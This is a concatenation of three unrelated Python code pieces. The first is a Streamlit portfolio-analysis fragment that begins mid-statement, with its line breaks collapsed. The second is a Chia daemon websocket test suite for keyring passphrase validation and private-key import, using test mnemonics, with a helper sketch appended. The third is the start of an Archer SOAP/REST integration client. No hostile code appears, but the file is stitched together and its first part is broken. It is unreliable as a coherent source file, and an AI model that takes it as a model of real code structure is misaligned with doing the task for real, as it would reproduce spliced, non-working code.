'Yes': # stock.get_info(proxy = proxy_server) #else: # stock.get_info() #st.write(stock.major_holders) #st.write(stock.institutional_holders) #st.write(stock.recommendations) else: #1) Percentage allocation check if (sum(company_weighs)<= 0.99) | (sum(company_weighs) >= 1.01): st.warning("The sum of the percentages must be equal to 1") else: with st.spinner(text='In progress: it may take a few seconds.'): dict_of_df, min_dates, error_tickers = download_data(portfolio_companies, start_date, end_date, proxy_option) min_common_date = max(min_dates) #2) Date check delta_period = datetime.timedelta(5) late_symbols = [symbol for symbol in list(dict_of_df.keys()) if dict_of_df[symbol]['Date'].min()>start_date+delta_period] if start_date < min_common_date - delta_period: if len(late_symbols)==1: st.warning(f"The earliest common date for the portfolio is on the: {min_common_date.strftime('%d/%B/%Y')}. {late_symbols} was listed after the selected start date ({start_date}).") else: st.warning(f"The earliest common date for the portfolio is on the: {min_common_date.strftime('%d/%B/%Y')}. {late_symbols} were listed after the selected start date ({start_date}).") company_list_df = list(dict_of_df.values()) #3) Ticker check if len(error_tickers)!=0: #If one symbol is delisted or not found, nothing is shown. 
st.warning(f"{error_tickers} No data found, symbol may be delisted") else: day_returns = portfolio_return(company_list_df, portfolio_companies, initial_investment, company_weighs, start_date, end_date ) if benchmark_option == 'None': benchmark_returns = day_returns[['Date']] else: if benchmark_option == 'S&P 500': benchmark_names = ['^GSPC'] dict_of_benchmark,_,_ = download_data(benchmark_names, min_common_date, end_date, proxy_option) benchmark_list_df = list(dict_of_benchmark.values()) elif benchmark_option == 'Nasdaq Composite': benchmark_names = ['^IXIC'] dict_of_benchmark,_,_ = download_data(benchmark_names, min_common_date, end_date, proxy_option) benchmark_list_df = list(dict_of_benchmark.values()) else: benchmark_names = ['^GSPC', '^IXIC'] dict_of_benchmark,_,_ = download_data(benchmark_names, min_common_date, end_date, proxy_option) benchmark_list_df = list(dict_of_benchmark.values()) benchmark_returns = benchmark_return(benchmark_list_df, benchmark_names, initial_investment) #WEALTH PLOT# fig_wealth_plot = wealth_plot(day_returns,benchmark_returns) st.plotly_chart(fig_wealth_plot) st.markdown(export_plotly_image_link(fig_wealth_plot ,path_file="./output/wealth_plot.html"), unsafe_allow_html=True) #DF# cumulative_return = day_returns['Return_acumulado_total'].tail(1).values[0] / 100 annualized_return = ((1 + cumulative_return) ** (365 / day_returns.shape[0]) - 1) * 100 df = pd.DataFrame([[str(initial_investment)+"$", str(round(day_returns['Investment_acumulado_total'].tail(1).values[0],1))+"$", str(round(annualized_return,1))]], columns=['Initial investment ($)','Final investment ($)','Annualized return (%)']) col1,col2,col3 = st.columns((5,10,5)) with col2: st.write(df) #ACCUMULATED RETURN PLOT# fig_accumulated_return = accumulated_return_plot(day_returns, benchmark_returns) st.plotly_chart(fig_accumulated_return) st.markdown(export_plotly_image_link(fig_accumulated_return, path_file="./output/accumulated_return_plot.html"), unsafe_allow_html=True) #DRAWDAWN PLOT# fig_drawdawn = drawdawn_plot(day_returns, benchmark_returns) st.plotly_chart(fig_drawdawn) st.markdown(export_plotly_image_link(fig_drawdawn, path_file="./output/drawdawn_plot.html"), unsafe_allow_html=True) # DAY RETURNS# fig_day_returns = day_returns_plot(day_returns, benchmark_returns) st.plotly_chart(fig_day_returns) st.markdown(export_plotly_image_link(fig_day_returns, path_file="./output/day_returns_plot.html"), unsafe_allow_html=True) #ALLOCATION PLOT# fig_allocation = allocation_plot(day_returns) st.plotly_chart(fig_allocation) st.markdown(export_plotly_image_link(fig_allocation, path_file="./output/allocation_plot.html"), unsafe_allow_html=True) ##SAVE ALL## stocks_string = '' for stock in portfolio_companies: stocks_string = stocks_string + "_" + str(stock) path = "./output" path_file = f"./output/portfolio_{stocks_string}_{start_date}.html" if os.path.exists(path): save_all(path_file=path_file) else: os.makedirs(path) save_all(path_file=path_file)
import aiohttp
import asyncio
import json
import logging
import pytest
import pytest_asyncio

from chia.daemon.server import WebSocketServer
from chia.server.outbound_message import NodeType
from chia.types.peer_info import PeerInfo
from tests.block_tools import BlockTools, create_block_tools_async
from chia.util.ints import uint16
from chia.util.keyring_wrapper import DEFAULT_PASSPHRASE_IF_NO_MASTER_PASSPHRASE
from chia.util.ws_message import create_payload
from tests.core.node_height import node_height_at_least
from tests.setup_nodes import setup_daemon, setup_full_system
from tests.simulation.test_simulation import test_constants_modified
from tests.time_out_assert import time_out_assert_custom_interval, time_out_assert
from tests.util.keyring import TempKeyring


@pytest_asyncio.fixture(scope="function")
async def get_temp_keyring():
    with TempKeyring() as keychain:
        yield keychain


@pytest_asyncio.fixture(scope="function")
async def get_b_tools_1(get_temp_keyring):
    return await create_block_tools_async(constants=test_constants_modified, keychain=get_temp_keyring)


@pytest_asyncio.fixture(scope="function")
async def get_b_tools(get_temp_keyring):
    local_b_tools = await create_block_tools_async(constants=test_constants_modified, keychain=get_temp_keyring)
    new_config = local_b_tools._config
    local_b_tools.change_config(new_config)
    return local_b_tools


@pytest_asyncio.fixture(scope="function")
async def get_daemon_with_temp_keyring(get_b_tools):
    async for daemon in setup_daemon(btools=get_b_tools):
        yield get_b_tools, daemon


# TODO: Ideally, the db_version should be the (parameterized) db_version
# fixture, to test all versions of the database schema. This doesn't work
# because of a hack in shutting down the full node, which means you cannot run
# more than one simulation per process.
@pytest_asyncio.fixture(scope="function")
async def simulation(bt, get_b_tools, get_b_tools_1):
    async for _ in setup_full_system(
        test_constants_modified, bt, b_tools=get_b_tools, b_tools_1=get_b_tools_1, connect_to_daemon=True, db_version=1
    ):
        yield _


class TestDaemon:
    @pytest.mark.asyncio
    async def test_daemon_simulation(self, self_hostname, simulation, bt, get_b_tools, get_b_tools_1):
        node1, node2, _, _, _, _, _, _, _, _, server1, daemon1 = simulation

        node2_port = node2.full_node.config["port"]
        await server1.start_client(PeerInfo(self_hostname, uint16(node2_port)))

        async def num_connections():
            count = len(node2.server.connection_by_type[NodeType.FULL_NODE].items())
            return count

        await time_out_assert_custom_interval(60, 1, num_connections, 1)
        await time_out_assert(1500, node_height_at_least, True, node2, 1)

        session = aiohttp.ClientSession()

        log = logging.getLogger()
        log.warning(f"Connecting to daemon on port {daemon1.daemon_port}")

        ws = await session.ws_connect(
            f"wss://127.0.0.1:{daemon1.daemon_port}",
            autoclose=True,
            autoping=True,
            heartbeat=60,
            ssl_context=get_b_tools.get_daemon_ssl_context(),
            max_msg_size=100 * 1024 * 1024,
        )
        service_name = "test_service_name"
        data = {"service": service_name}
        payload = create_payload("register_service", data, service_name, "daemon")
        await ws.send_str(payload)

        message_queue = asyncio.Queue()

        async def reader(ws, queue):
            while True:
                msg = await ws.receive()
                if msg.type == aiohttp.WSMsgType.TEXT:
                    message = msg.data.strip()
                    message = json.loads(message)
                    await queue.put(message)
                elif msg.type == aiohttp.WSMsgType.PING:
                    await ws.pong()
                elif msg.type == aiohttp.WSMsgType.PONG:
                    continue
                else:
                    if msg.type == aiohttp.WSMsgType.CLOSE:
                        await ws.close()
                    elif msg.type == aiohttp.WSMsgType.ERROR:
                        await ws.close()
                    elif msg.type == aiohttp.WSMsgType.CLOSED:
                        pass
                    break

        read_handler = asyncio.create_task(reader(ws, message_queue))
        data = {}
        payload = create_payload("get_blockchain_state", data, service_name, "chia_full_node")
        await ws.send_str(payload)

        await asyncio.sleep(5)
        blockchain_state_found = False
        while not message_queue.empty():
            message = await message_queue.get()
            if message["command"] == "get_blockchain_state":
                blockchain_state_found = True

        await ws.close()
        read_handler.cancel()
        assert blockchain_state_found

    # Suppress warning: "The explicit passing of coroutine objects to asyncio.wait() is deprecated since Python 3.8..."
    # Can be removed when we upgrade to a newer version of websockets (9.1 works)
    @pytest.mark.filterwarnings("ignore::DeprecationWarning:websockets.*")
    @pytest.mark.asyncio
    async def test_validate_keyring_passphrase_rpc(self, get_daemon_with_temp_keyring):
        local_b_tools: BlockTools = get_daemon_with_temp_keyring[0]
        keychain = local_b_tools.local_keychain

        # When: the keychain has a master passphrase set
        keychain.set_master_passphrase(
            current_passphrase=DEFAULT_PASSPHRASE_IF_NO_MASTER_PASSPHRASE, new_passphrase="the correct passphrase"
        )

        async def check_success_case(response: aiohttp.http_websocket.WSMessage):
            # Expect: JSON response
            assert response.type == aiohttp.WSMsgType.TEXT
            message = json.loads(response.data.strip())
            # Expect: daemon handled the request
            assert message["ack"] is True
            # Expect: success flag is set to True
            assert message["data"]["success"] is True

        async def check_bad_passphrase_case(response: aiohttp.http_websocket.WSMessage):
            # Expect: JSON response
            assert response.type == aiohttp.WSMsgType.TEXT
            message = json.loads(response.data.strip())
            # Expect: daemon handled the request
            assert message["ack"] is True
            # Expect: success flag is set to False
            assert message["data"]["success"] is False

        async def check_missing_passphrase_case(response: aiohttp.http_websocket.WSMessage):
            # Expect: JSON response
            assert response.type == aiohttp.WSMsgType.TEXT
            message = json.loads(response.data.strip())
            # Expect: daemon handled the request
            assert message["ack"] is True
            # Expect: success flag is set to False
            assert message["data"]["success"] is False
            # Expect: error string is set
            assert message["data"]["error"] == "missing key"

        async def check_empty_passphrase_case(response: aiohttp.http_websocket.WSMessage):
            # Expect: JSON response
            assert response.type == aiohttp.WSMsgType.TEXT
            message = json.loads(response.data.strip())
            # Expect: daemon handled the request
            assert message["ack"] is True
            # Expect: success flag is set to False
            assert message["data"]["success"] is False

        async with aiohttp.ClientSession() as session:
            async with session.ws_connect(
                f"wss://127.0.0.1:{local_b_tools._config['daemon_port']}",
                autoclose=True,
                autoping=True,
                heartbeat=60,
                ssl=local_b_tools.get_daemon_ssl_context(),
                max_msg_size=52428800,
            ) as ws:
                # When: using the correct passphrase
                await ws.send_str(
                    create_payload("validate_keyring_passphrase", {"key": "the correct passphrase"}, "test", "daemon")
                )
                # Expect: validation succeeds
                await check_success_case(await ws.receive())

                # When: using the wrong passphrase
                await ws.send_str(
                    create_payload("validate_keyring_passphrase", {"key": "the wrong passphrase"}, "test", "daemon")
                )
                # Expect: validation failure
                await check_bad_passphrase_case(await ws.receive())

                # When: not including the passphrase in the payload
                await ws.send_str(create_payload("validate_keyring_passphrase", {}, "test", "daemon"))
                # Expect: validation failure
                await check_missing_passphrase_case(await ws.receive())

                # When: including an empty passphrase in the payload
                await ws.send_str(create_payload("validate_keyring_passphrase", {"key": ""}, "test", "daemon"))
                # Expect: validation failure
                await check_empty_passphrase_case(await ws.receive())

    # Suppress warning: "The explicit passing of coroutine objects to asyncio.wait() is deprecated since Python 3.8..."
    # Can be removed when we upgrade to a newer version of websockets (9.1 works)
    @pytest.mark.filterwarnings("ignore::DeprecationWarning:websockets.*")
    @pytest.mark.asyncio
    async def test_add_private_key(self, get_daemon_with_temp_keyring):
        local_b_tools: BlockTools = get_daemon_with_temp_keyring[0]
        daemon: WebSocketServer = get_daemon_with_temp_keyring[1]
        keychain = daemon.keychain_server._default_keychain  # Keys will be added here
        test_mnemonic = (
            "grief lock ketchup video day owner torch young work "
            "another venue evidence spread season bright private "
            "tomato remind jaguar original blur embody project can"
        )
        test_fingerprint = 2877570395
        mnemonic_with_typo = f"{test_mnemonic}xyz"  # intentional typo: can -> canxyz
        mnemonic_with_missing_word = " ".join(test_mnemonic.split(" ")[:-1])  # missing last word

        async def check_success_case(response: aiohttp.http_websocket.WSMessage):
            nonlocal keychain
            # Expect: JSON response
            assert response.type == aiohttp.WSMsgType.TEXT
            message = json.loads(response.data.strip())
            # Expect: daemon handled the request
            assert message["ack"] is True
            # Expect: success flag is set to True
            assert message["data"]["success"] is True
            # Expect: the keychain has the new key
            assert keychain.get_private_key_by_fingerprint(test_fingerprint) is not None

        async def check_missing_param_case(response: aiohttp.http_websocket.WSMessage):
            # Expect: JSON response
            assert response.type == aiohttp.WSMsgType.TEXT
            message = json.loads(response.data.strip())
            # Expect: daemon handled the request
            assert message["ack"] is True
            # Expect: success flag is set to False
            assert message["data"]["success"] is False
            # Expect: error field is set to "malformed request"
            assert message["data"]["error"] == "malformed request"
            # Expect: error_details message is set to "missing mnemonic and/or passphrase"
            assert message["data"]["error_details"]["message"] == "missing mnemonic and/or passphrase"

        async def check_mnemonic_with_typo_case(response: aiohttp.http_websocket.WSMessage):
            # Expect: JSON response
            assert response.type == aiohttp.WSMsgType.TEXT
            message = json.loads(response.data.strip())
            # Expect: daemon handled the request
            assert message["ack"] is True
            # Expect: success flag is set to False
            assert message["data"]["success"] is False
            # Expect: error field is set to "'canxyz' is not in the mnemonic dictionary; may be misspelled"
            assert message["data"]["error"] == "'canxyz' is not in the mnemonic dictionary; may be misspelled"

        async def check_invalid_mnemonic_length_case(response: aiohttp.http_websocket.WSMessage):
            # Expect: JSON response
            assert response.type == aiohttp.WSMsgType.TEXT
            message = json.loads(response.data.strip())
            # Expect: daemon handled the request
            assert message["ack"] is True
            # Expect: success flag is set to False
            assert message["data"]["success"] is False
            # Expect: error field is set to "Invalid mnemonic length"
            assert message["data"]["error"] == "Invalid mnemonic length"

        async def check_invalid_mnemonic_case(response: aiohttp.http_websocket.WSMessage):
            # Expect: JSON response
            assert response.type == aiohttp.WSMsgType.TEXT
            message = json.loads(response.data.strip())
            # Expect: daemon handled the request
            assert message["ack"] is True
            # Expect: success flag is set to False
            assert message["data"]["success"] is False
            # Expect: error field is set to "Invalid order of mnemonic words"
            assert message["data"]["error"] == "Invalid order of mnemonic words"

        async with aiohttp.ClientSession() as session:
            async with session.ws_connect(
                f"wss://127.0.0.1:{local_b_tools._config['daemon_port']}",
                autoclose=True,
                autoping=True,
                heartbeat=60,
                ssl=local_b_tools.get_daemon_ssl_context(),
                max_msg_size=52428800,
            ) as ws:
                # Expect the key hasn't been added yet
                assert keychain.get_private_key_by_fingerprint(test_fingerprint) is None

                await ws.send_str(
                    create_payload("add_private_key", {"mnemonic": test_mnemonic, "passphrase": ""}, "test", "daemon")
                )
                # Expect: key was added successfully
                await check_success_case(await ws.receive())

                # When: missing mnemonic
                await ws.send_str(create_payload("add_private_key", {"passphrase": ""}, "test", "daemon"))
                # Expect: Failure due to missing mnemonic
                await check_missing_param_case(await ws.receive())

                # When: missing passphrase
                await ws.send_str(create_payload("add_private_key", {"mnemonic": test_mnemonic}, "test", "daemon"))
                # Expect: Failure due to missing passphrase
                await check_missing_param_case(await ws.receive())

                # When: using a mnemonic with an incorrect word (typo)
                await ws.send_str(
                    create_payload(
                        "add_private_key", {"mnemonic": mnemonic_with_typo, "passphrase": ""}, "test", "daemon"
                    )
                )
                # Expect: Failure due to misspelled mnemonic
                await check_mnemonic_with_typo_case(await ws.receive())

                # When: using a mnemonic with an incorrect word count
                await ws.send_str(
                    create_payload(
                        "add_private_key", {"mnemonic": mnemonic_with_missing_word, "passphrase": ""}, "test", "daemon"
                    )
                )
                # Expect: Failure due to invalid mnemonic
                await check_invalid_mnemonic_length_case(await ws.receive())

                # When: using an incorrect mnemonic
                await ws.send_str(
                    create_payload(
                        "add_private_key", {"mnemonic": " ".join(["abandon"] * 24), "passphrase": ""}, "test", "daemon"
                    )
                )
                # Expect: Failure due to checksum error
                await check_invalid_mnemonic_case(await ws.receive())
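# --- Illustrative sketch, not part of the test suite: the send/receive round
# trip the checks above repeat. `daemon_round_trip` is a hypothetical helper;
# it sends one create_payload-formatted command over the daemon websocket and
# returns the parsed JSON reply, which the tests inspect via message["ack"]
# and message["data"]["success"].
async def daemon_round_trip(ws, command: str, data: dict) -> dict:
    await ws.send_str(create_payload(command, data, "test", "daemon"))
    response = await ws.receive()
    assert response.type == aiohttp.WSMsgType.TEXT
    return json.loads(response.data.strip())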
from datetime import timezone
from typing import Dict, Tuple

import dateparser
import urllib3
from CommonServerPython import *

''' IMPORTS '''

# Disable insecure warnings
urllib3.disable_warnings()

OCCURRED_FORMAT = '%Y-%m-%dT%H:%M:%SZ'
REQUEST_HEADERS = {
    'Accept': 'application/json,text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Content-Type': 'application/json'
}

FIELD_TYPE_DICT = {
    1: 'Text',
    2: 'Numeric',
    3: 'Date',
    4: 'Values List',
    6: 'TrackingID',
    7: 'External Links',
    8: 'Users/Groups List',
    9: 'Cross-Reference',
    11: 'Attachment',
    12: 'Image',
    14: 'Cross-Application Status Tracking (CAST)',
    16: 'Matrix',
    19: 'IP Address',
    20: 'Record Status',
    21: 'First Published',
    22: 'Last Updated Field',
    23: 'Related Records',
    24: 'Sub-Form',
    25: 'History Log',
    26: 'Discussion',
    27: 'Multiple Reference Display Control',
    28: 'Questionnaire Reference',
    29: 'Access History',
    30: 'Voting',
    31: 'Scheduler',
    1001: 'Cross-Application Status Tracking Field Value'
}

ACCOUNT_STATUS_DICT = {1: 'Active', 2: 'Inactive', 3: 'Locked'}


def format_time(datetime_object: datetime, use_european_time: bool) -> str:
    """Transform datetime to string; handles European time.

    Arguments:
        datetime_object: object to transform
        use_european_time: whether the day should come first in the string (European format)

    Returns:
        A string formatted: 7/22/2017 3:58 PM (American) or 22/7/2017 3:58 PM (European)
    """
    time_format = '%d/%m/%Y %I:%M %p' if use_european_time else '%m/%d/%Y %I:%M %p'
    return datetime_object.strftime(time_format)


def parse_date_to_datetime(date: str, day_first: bool = False) -> datetime:
    """Return a datetime object from given date. Format of "1/1/2020 04:00 PM".

    Arguments:
        date: a date string
        day_first: is the day first in the string (European)

    Returns:
        a datetime object
    """
    date_order = {'DATE_ORDER': 'DMY' if day_first else 'MDY'}
    date_obj = parser(date, settings=date_order)
    return date_obj


def parser(date_str, date_formats=None, languages=None, locales=None, region=None, settings=None) -> datetime:
    """Wrapper of dateparser.parse to support return type value"""
    date_obj = dateparser.parse(
        date_str, date_formats=date_formats, languages=languages, locales=locales, region=region, settings=settings
    )
    assert isinstance(date_obj, datetime), f'Could not parse date {date_str}'  # MYPY Fix
    return date_obj


def get_token_soap_request(user, password, instance):
    return '<?xml version="1.0" encoding="utf-8"?>' + \
           '<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" ' \
           'xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">' + \
           '    <soap:Body>' + \
           '        <CreateUserSessionFromInstance xmlns="http://archer-tech.com/webservices/">' + \
           f'            <userName>{user}</userName>' + \
           f'            <instanceName>{instance}</instanceName>' + \
           f'            <password>{password}</password>' + \
           '        </CreateUserSessionFromInstance>' + \
           '    </soap:Body>' + \
           '</soap:Envelope>'


def terminate_session_soap_request(token):
    return '<?xml version="1.0" encoding="utf-8"?>' + \
           '<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"' \
           ' xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">' + \
           '    <soap:Body>' + \
           '        <TerminateSession xmlns="http://archer-tech.com/webservices/">' + \
           f'            <sessionToken>{token}</sessionToken>' + \
           '        </TerminateSession>' + \
           '    </soap:Body>' + \
           '</soap:Envelope>'


def get_reports_soap_request(token):
    return '<?xml version="1.0" encoding="utf-8"?>' + \
           '<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" ' \
           'xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">' + \
           '    <soap:Body>' + \
           '        <GetReports xmlns="http://archer-tech.com/webservices/">' + \
           f'            <sessionToken>{token}</sessionToken>' + \
           '        </GetReports>' + \
           '    </soap:Body>' + \
           '</soap:Envelope>'


def get_statistic_search_report_soap_request(token, report_guid, max_results):
    return '<?xml version="1.0" encoding="utf-8"?>' + \
           '<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"' \
           ' xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">' + \
           '    <soap:Body>' + \
           '        <ExecuteStatisticSearchByReport xmlns="http://archer-tech.com/webservices/">' + \
           f'            <sessionToken>{token}</sessionToken>' + \
           f'            <reportIdOrGuid>{report_guid}</reportIdOrGuid>' + \
           f'            <pageNumber>{max_results}</pageNumber>' + \
           '        </ExecuteStatisticSearchByReport>' + \
           '    </soap:Body>' + \
           '</soap:Envelope>'


def get_search_options_soap_request(token, report_guid):
    return '<?xml version="1.0" encoding="utf-8"?>' + \
           '<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" ' \
           'xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">' + \
           '    <soap:Body>' + \
           '        <GetSearchOptionsByGuid xmlns="http://archer-tech.com/webservices/">' + \
           f'            <sessionToken>{token}</sessionToken>' + \
           f'            <searchReportGuid>{report_guid}</searchReportGuid>' + \
           '        </GetSearchOptionsByGuid>' + \
           '    </soap:Body>' + \
           '</soap:Envelope>'


def search_records_by_report_soap_request(token, report_guid):
    return '<?xml version="1.0" encoding="utf-8"?>' + \
           '<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" ' \
           'xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">' + \
           '    <soap:Body>' + \
           '        <SearchRecordsByReport xmlns="http://archer-tech.com/webservices/">' + \
           f'            <sessionToken>{token}</sessionToken>' + \
           f'            <reportIdOrGuid>{report_guid}</reportIdOrGuid>' + \
           '            <pageNumber>1</pageNumber>' + \
           '        </SearchRecordsByReport>' + \
           '    </soap:Body>' + \
           '</soap:Envelope>'


def search_records_soap_request(token, app_id, display_fields, field_id, field_name, search_value,
                                date_operator='', numeric_operator='', max_results=10):
    request_body = '<?xml version="1.0" encoding="UTF-8"?>' + \
                   '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" ' \
                   'xmlns:xsd="http://www.w3.org/2001/XMLSchema"' \
                   ' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">' + \
                   '    <soap:Body>' + \
                   '        <ExecuteSearch xmlns="http://archer-tech.com/webservices/">' + \
                   f'            <sessionToken>{token}</sessionToken>' + \
                   '            <searchOptions>' + \
                   '                <![CDATA[<SearchReport>' + \
                   '                    <PageSize>100</PageSize>' + \
                   '                    <PageNumber>1</PageNumber>' + \
                   f'                    <MaxRecordCount>{max_results}</MaxRecordCount>' + \
                   '                    <ShowStatSummaries>false</ShowStatSummaries>' + \
                   f'                    <DisplayFields>{display_fields}</DisplayFields>' + \
                   f'                    <Criteria><ModuleCriteria><Module name="appname">{app_id}</Module></ModuleCriteria>'

    if search_value:
        request_body += '<Filter><Conditions>'
        if date_operator:
            request_body += '<DateComparisonFilterCondition>' + \
                            f'    <Operator>{date_operator}</Operator>' + \
                            f'    <Field name="{field_name}">{field_id}</Field>' + \
                            f'    <Value>{search_value}</Value>' + \
                            '    <TimeZoneId>UTC Standard Time</TimeZoneId>' + \
                            '    <IsTimeIncluded>TRUE</IsTimeIncluded>' + \
                            '</DateComparisonFilterCondition >'
        elif numeric_operator:
            request_body += '<NumericFilterCondition>' + \
                            f'    <Operator>{numeric_operator}</Operator>' + \
                            f'    <Field name="{field_name}">{field_id}</Field>' + \
                            f'    <Value>{search_value}</Value>' + \
                            '</NumericFilterCondition >'
        else:
            request_body += '<TextFilterCondition>' + \
                            '    <Operator>Contains</Operator>' + \
                            f'    <Field name="{field_name}">{field_id}</Field>' + \
                            f'    <Value>{search_value}</Value>' + \
                            '</TextFilterCondition >'
        request_body += '</Conditions></Filter>'

    if date_operator:  # Fetch incidents must present date_operator
        request_body += '<Filter>' + \
                        '<Conditions>' + \
                        '    <DateComparisonFilterCondition>' + \
                        f'        <Operator>{date_operator}</Operator>' + \
                        f'        <Field name="{field_name}">{field_id}</Field>' + \
                        f'        <Value>{search_value}</Value>' + \
                        '        <TimeZoneId>UTC Standard Time</TimeZoneId>' + \
                        '        <IsTimeIncluded>TRUE</IsTimeIncluded>' + \
                        '    </DateComparisonFilterCondition >' + \
                        '</Conditions>' + \
                        '</Filter>'

    request_body += '    </Criteria></SearchReport>]]>' + \
                    '</searchOptions>' + \
                    '<pageNumber>1</pageNumber>' + \
                    '</ExecuteSearch>' + \
                    '</soap:Body>' + \
                    '</soap:Envelope>'
    return request_body


SOAP_COMMANDS = {
    'archer-get-reports': {
        'soapAction': 'http://archer-tech.com/webservices/GetReports',
        'urlSuffix': 'ws/search.asmx',
        'soapBody': get_reports_soap_request,
        'outputPath': 'Envelope.Body.GetReportsResponse.GetReportsResult'
    },
    'archer-execute-statistic-search-by-report': {
        'soapAction': 'http://archer-tech.com/webservices/ExecuteStatisticSearchByReport',
        'urlSuffix': 'ws/search.asmx',
        'soapBody': get_statistic_search_report_soap_request,
        'outputPath': 'Envelope.Body.ExecuteStatisticSearchByReportResponse.ExecuteStatisticSearchByReportResult'
    },
    'archer-get-search-options-by-guid': {
        'soapAction': 'http://archer-tech.com/webservices/GetSearchOptionsByGuid',
        'urlSuffix': 'ws/search.asmx',
        'soapBody': get_search_options_soap_request,
        'outputPath': 'Envelope.Body.GetSearchOptionsByGuidResponse.GetSearchOptionsByGuidResult'
    },
    'archer-search-records': {
        'soapAction': 'http://archer-tech.com/webservices/ExecuteSearch',
        'urlSuffix': 'ws/search.asmx',
        'soapBody': search_records_soap_request,
        'outputPath': 'Envelope.Body.ExecuteSearchResponse.ExecuteSearchResult'
    },
    'archer-search-records-by-report': {
        'soapAction': 'http://archer-tech.com/webservices/SearchRecordsByReport',
        'urlSuffix': 'ws/search.asmx',
        'soapBody': search_records_by_report_soap_request,
        'outputPath': 'Envelope.Body.SearchRecordsByReportResponse.SearchRecordsByReportResult'
    }
}
class Client(BaseClient):
    def __init__(self, base_url, username, password, instance_name, domain, **kwargs):
        self.username = username
        self.password = password
        self.instance_name = instance_name
        self.domain = domain
        super(Client, self).__init__(base_url=base_url, headers=REQUEST_HEADERS, **kwargs)

    def do_request(self, method, url_suffix, data=None, params=None):
        if not REQUEST_HEADERS.get('Authorization'):
            self.update_session()

        res = self._http_request(method, url_suffix, headers=REQUEST_HEADERS, json_data=data, params=params,
                                 resp_type='response', ok_codes=(200, 401))

        if res.status_code == 401:
            self.update_session()
            res = self._http_request(method, url_suffix, headers=REQUEST_HEADERS, json_data=data,
                                     resp_type='response', ok_codes=(200, 401))

        return res.json()

    def update_session(self):
        body = {
            'InstanceName': self.instance_name,
            'Username': self.username,
            'UserDomain': self.domain,
            'Password': self.password
        }
        res = self._http_request('POST', '/api/core/security/login', json_data=body)
        is_successful_response = res.get('IsSuccessful')
        if not is_successful_response:
            return_error(res.get('ValidationMessages'))
        session = res.get('RequestedObject', {}).get('SessionToken')
        REQUEST_HEADERS['Authorization'] = f'Archer session-id={session}'

    def get_token(self):
        body = get_token_soap_request(self.username, self.password, self.instance_name)
        headers = {'SOAPAction': 'http://archer-tech.com/webservices/CreateUserSessionFromInstance',
                   'Content-Type': 'text/xml; charset=utf-8'}
        res = self._http_request('POST', 'ws/general.asmx', headers=headers, data=body, resp_type='content')

        return extract_from_xml(res, 'Envelope.Body.CreateUserSessionFromInstanceResponse.'
                                     'CreateUserSessionFromInstanceResult')

    def destroy_token(self, token):
        body = terminate_session_soap_request(token)
        headers = {'SOAPAction': 'http://archer-tech.com/webservices/TerminateSession',
                   'Content-Type': 'text/xml; charset=utf-8'}
        self._http_request('POST', 'ws/general.asmx', headers=headers, data=body, resp_type='content')

    def do_soap_request(self, command, **kwargs):
        req_data = SOAP_COMMANDS[command]
        headers = {'SOAPAction': req_data['soapAction'], 'Content-Type': 'text/xml; charset=utf-8'}
        token = self.get_token()
        body = req_data['soapBody'](token, **kwargs)  # type: ignore
        res = self._http_request('POST', req_data['urlSuffix'], headers=headers, data=body, resp_type='content')
        self.destroy_token(token)
        return extract_from_xml(res, req_data['outputPath']), res

    def get_level_by_app_id(self, app_id):
        cache = demisto.getIntegrationContext()
        if cache.get(app_id):
            return cache[app_id]

        levels = []
        all_levels_res = self.do_request('GET', f'/api/core/system/level/module/{app_id}')
        for level in all_levels_res:
            if level.get('RequestedObject') and level.get('IsSuccessful'):
                level_id = level.get('RequestedObject').get('Id')

                fields = {}
                level_res = self.do_request('GET', f'/api/core/system/fielddefinition/level/{level_id}')
                for field in level_res:
                    if field.get('RequestedObject') and field.get('IsSuccessful'):
                        field_item = field.get('RequestedObject')
                        field_id = str(field_item.get('Id'))
                        fields[field_id] = {'Type': field_item.get('Type'),
                                            'Name': field_item.get('Name'),
                                            'FieldId': field_id,
                                            'IsRequired': field_item.get('IsRequired', False),
                                            'RelatedValuesListId': field_item.get('RelatedValuesListId')}

                levels.append({'level': level_id, 'mapping': fields})

        if levels:
            cache[int(app_id)] = levels
            demisto.setIntegrationContext(cache)
            return levels
        return []

    def get_record(self, app_id, record_id):
        res = self.do_request('GET', f'/api/core/content/{record_id}')

        if not isinstance(res, dict):
            res = res.json()

        errors = get_errors_from_res(res)
        record = {}
        if res.get('RequestedObject') and res.get('IsSuccessful'):
            content_obj = res.get('RequestedObject')
            level_id = content_obj.get('LevelId')
            levels = self.get_level_by_app_id(app_id)
            level_fields = list(filter(lambda m: m['level'] == level_id, levels))
            if level_fields:
                level_fields = level_fields[0]['mapping']
            else:
                return {}, res, errors

            for _id, field in content_obj.get('FieldContents').items():
                field_data = level_fields.get(str(_id))  # type: ignore
                field_type = field_data.get('Type')

                # when field type is IP Address
                if field_type == 19:
                    field_value = field.get('IpAddressBytes')
                # when field type is Values List
                elif field_type == 4 and field.get('Value') and field['Value'].get('ValuesListIds'):
                    list_data = self.get_field_value_list(_id)
                    list_ids = field['Value']['ValuesListIds']
                    list_ids = list(filter(lambda x: x['Id'] in list_ids, list_data['ValuesList']))
                    field_value = list(map(lambda x: x['Name'], list_ids))
                else:
                    field_value = field.get('Value')

                if field_value:
                    record[field_data.get('Name')] = field_value
            record['Id'] = content_obj.get('Id')
        return record, res, errors

